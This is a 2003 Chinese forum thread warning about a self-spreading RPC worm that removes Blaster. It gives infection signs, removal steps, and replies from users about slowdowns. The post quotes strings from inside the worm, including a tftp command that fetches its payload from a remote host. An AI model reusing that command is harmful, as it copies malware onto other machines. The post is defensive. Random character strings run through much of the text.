下沙论坛

 找回密码
 注册论坛(EC通行证)

用新浪微博连接

一步搞定

QQ登录

QQ登录

下沙大学生网QQ群8(千人群)
群号:6490324 ,验证:下沙大学生网。
用手机发布本地信息严禁群发,各种宣传贴请发表在下沙信息版块有问必答,欢迎提问 提升会员等级,助你宣传
新会员必读 大学生的论坛下沙新生必读下沙币获得方法及使用
查看: 2697|回复: 7
打印 上一主题 下一主题

[转帖]最新RPC漏洞病毒.关于最近的疯狂ping

[复制链接]

该用户从未签到

跳转到指定楼层
1
发表于 2003-8-30 22:50:00 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
该病毒的特点是将“冲击波”(Worm.Blaster)病( i+ I3 I, k* A# K4 \0 y  ~6 B
* K3 P2 P+ a9 K: d) X" V. p
毒干掉,并在系统内值入,预防冲击波病毒的疫苗。
' m9 g/ ?0 p: g% `
3 c, i1 \' g3 o1 j然后这个新病毒会尝试从微软网站下载补丁并自动将受感染的系统打上补丁。然
# [7 y% M% e* U4 |/ l/ T8 n" r6 P2 {; R- Y. f$ Y8 g2 }; m
后该病毒会开启数百个的线程PING其它IP地址,并通过RPC漏洞快速传播自己,3 n$ I% y# ]) ?

& `: \4 _7 a3 O, B! h( Q消耗大量CPU和网络资源,并且有可能会导致系统死机。该病毒的作者似乎无意9 C# b. |; K& P" S: l" {% @
5 `* n& s& H. a2 l1 B+ Q1 H( Q
作恶,病毒设定在2004年自行毁灭。* J( f: P+ {+ R
1 w" J! O4 |+ i1 E
由于该病毒采用PING方式进行探测,只感染能够PING通的机器,因此广大用户,) R2 Y/ f1 T; P/ U
; t2 e( t) e1 O; }2 U5 Q, b3 x6 j0 }
设置防火墙的规则,禁止ping,这样可以有效防止该病毒的入侵。
- k( X: ^0 m# @! H4 L! z5 l7 R
) ~2 Y. C- a4 I, m& d) t: \, x8 `& S- K+ k+ }- U
如果大家在自己 的system32 目录里的WINS目录里发现DLLHOST.EXE 和SVCHOST.EXE那么你肯定中毒了。。请自己在启动里删除。。并且删除这2个文件。。传染比较快。。希望大家安装防护墙,,这是中国人自己编译的病毒5 m1 C# T0 I0 J) G, v

0 {! N3 V4 h3 I& tSVCHOST.EXE 大小是19.2K; s+ R& ?3 P. j' ^7 L- X2 `; f
DLLHOST.EXE 大小是10.K* S: @  {% x+ j" f9 ]3 U& _6 h

& J" I# \3 k* }. ?9 n8 I3 W3 CDLLHOST.EXE里面有这样的话!2 E; f+ o) g3 a; O% ~/ g

0 N5 _0 h) h. G. S1 H# N- j
9 P3 p2 ^$ q1 L3 K3 M引用:* \0 [& E. ]9 K4 i/ f7 p. S- d
3 s2 {+ R6 x& l/ {1 ^! u/ S/ i
=========== I love my wife & baby ~~~ Welcome Chian~~~ Notice: 2004 will remove myself~~ sorry zhongli~~~=========== wins http://download.microsoft.com/downl...980-x86-KOR.exe ; http://download.microsoft.com/downl...980-x86-CHT.exe ; http://download.microsoft.com/downl...980-x86-CHS.exe ; http://download.microsoft.com/downl...980-x86-ENU.exe ; http://download.microsoft.com/downl...980-x86-KOR.exe ; http://download.microsoft.com/downl...980-x86-CHT.exe ; http://download.microsoft.com/downl...980-x86-CHS.exe ; http://download.microsoft.com/downl...980-x86-ENU.exe ; tftp -i %s get svchost.exe wins\SVCHOST.EXE
  ^( J- y9 o+ |# L6 w* h+ K; i4 X! o8 ^+ w
这2个文件在在:%Windir%\system32\wins\目录里..(注意:不是:%Windir%\system32\..)
1 j0 Y# u# O  A; v9 q, }& b! {9 x4 L; b4 {/ d

+ p$ L/ e! f7 j* v$ B% m紧急解决方案:- p) J( X  V( ^) V" W  R+ V( [% F0 R* g( w
停止一下两个服务:: @' y- W1 Z7 ~4 ]
* C, |+ k. b! L/ g3 c" i
Network connections Sharing' m4 w9 P. ^1 x. }% _) T% @7 f
WINS Client
! C+ j; p* G. `9 E$ G0 @
, ?& p; g. B& Z% Z: G在:%Windir%\system32\wins\ ) |: E; T7 A+ Y0 g
目录下删除:
& f9 l' S7 G3 i2 F  H4 K1 k- ?6 _) [2 m0 t+ {! `
SVCHOST.EXE6 Y( y" a! s( Z  n8 d, d6 ]! Q
DLLHOST.EXE
/ e) T7 D5 j: T! t1 H2 Z* j; H) H$ h7 l- [
这两个文件,安装防火墙,并禁止PING。
9 H: Q+ D2 Z5 z1 `( A
分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏 分享分享 顶 踩 转发到微博
  • TA的每日心情
    擦汗
    3 天前
  • 签到天数: 2339 天

    [LV.Master]伴坛终老

    8
    发表于 2003-9-7 21:31:00 | 只看该作者
    删除染毒文件,安装补丁,然后安装天网防火墙,这样就不会再次感染

    该用户从未签到

    7
     楼主| 发表于 2003-9-7 15:18:00 | 只看该作者
    看来还是取消网络共乡有效啊~~

    该用户从未签到

    6
    发表于 2003-9-7 12:35:00 | 只看该作者
    唉,没用的,我改到了2005,还是这样 ,要卡的,CPU利用率到快一百了,,我不共享马上就好了,有没有别的办法啊
    sai 该用户已被删除
    5
    发表于 2003-9-7 10:03:00 | 只看该作者
    把日期改到2004年以后呀
    带你去看海 该用户已被删除
    4
    发表于 2003-9-7 09:34:00 | 只看该作者
    有点麻烦。。。。。。。。

    该用户从未签到

    3
    发表于 2003-9-7 08:59:00 | 只看该作者
    请问,要是我要共享,又要不受这病毒,那该怎么办,因为我们是共享上网的

    该用户从未签到

    2
    发表于 2003-8-31 12:08:00 | 只看该作者
    防火墙跳个不停
    关闭

    下沙大学生网推荐上一条 /1 下一条

    快速回复 返回顶部 返回列表